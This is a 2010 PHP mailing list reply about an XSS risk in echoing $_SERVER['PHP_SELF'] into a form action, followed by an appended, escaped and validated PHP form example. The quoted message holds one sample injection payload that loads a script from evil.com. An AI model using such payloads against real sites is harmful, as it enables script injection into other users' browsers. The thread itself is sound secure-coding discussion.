On Wed, Mar 10, 2010 at 22:27, Jochem Maas <joc...@iamjochem.com> wrote:
> Op 3/10/10 6:23 PM, Joseph Thayne schreef:
>> Looks to me like you are closing your form before you put anything in
>> it.  Therefore, the loan_amount is not set making the value 0.  Follow
>> the math, and you are dividing by 1-1.
>>
>> Change this line:
>>
>> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"></form>
>>
>> to:
>>
>> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
>
> this is an XSS waiting to happen. I can put something like the following in
> the request uri:
>
> index.php?" onsubmit="evil()"><script 
> src="http://www.evil.com/evi.js";></script>
>
> with regard to the original problem - some input validation is in order.

PHP_SELF doesn't contain the query string, so your particular attack
wouldn't work. It's still a security issue though.

-- 
Daniel Egeberg

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
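As an added illustration (not code from the thread or from any of the posters), here is how the form discussed above could be rendered so that `$_SERVER['PHP_SELF']` is escaped before it lands in the `action` attribute and `loan_amount` is validated before any division. The payment formula is a placeholder assumption, since the original script is not quoted in the thread.

```php
<?php
// Added example, not from the thread. It escapes $_SERVER['PHP_SELF'] (whose
// path-info part is attacker-controlled) and validates the posted loan_amount
// before it is used in arithmetic, so a zero can never reach the divisor.

// Escape quotes, angle brackets and ampersands so nothing can break out of
// the action="..." attribute.
$action = htmlspecialchars($_SERVER['PHP_SELF'], ENT_QUOTES | ENT_HTML5, 'UTF-8');

// Input validation: accept only a float, then require it to be positive.
// filter_input returns null when the field is absent and false when invalid.
$loanAmount = filter_input(INPUT_POST, 'loan_amount', FILTER_VALIDATE_FLOAT);
$error  = null;
$result = null;

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if ($loanAmount === null || $loanAmount === false || $loanAmount <= 0) {
        $error = 'Please enter a loan amount greater than zero.';
    } else {
        // Placeholder calculation (assumption: the real formula is not in the
        // thread). The divisor is checked explicitly instead of trusted.
        $months = 12;
        $rate   = 0.05 / 12;
        $factor = pow(1 + $rate, $months) - 1;   // zero only when $rate is 0
        $result = $factor > 0
            ? $loanAmount * $rate * pow(1 + $rate, $months) / $factor
            : $loanAmount / $months;
    }
}
?>
<?php if ($error !== null): ?>
  <p><?php echo htmlspecialchars($error, ENT_QUOTES, 'UTF-8'); ?></p>
<?php endif; ?>
<form action="<?php echo $action; ?>" method="post">
  <label>Loan amount:
    <input type="text" name="loan_amount"
           value="<?php echo htmlspecialchars((string) ($loanAmount ?: ''), ENT_QUOTES, 'UTF-8'); ?>">
  </label>
  <input type="submit" value="Calculate">
</form>
<?php if ($result !== null): ?>
  <p>Monthly payment: <?php echo number_format($result, 2); ?></p>
<?php endif; ?>
```

Omitting the `action` attribute entirely (the browser then posts to the current URL) or using `$_SERVER['SCRIPT_NAME']`, which excludes path info, avoids echoing `PHP_SELF` at all.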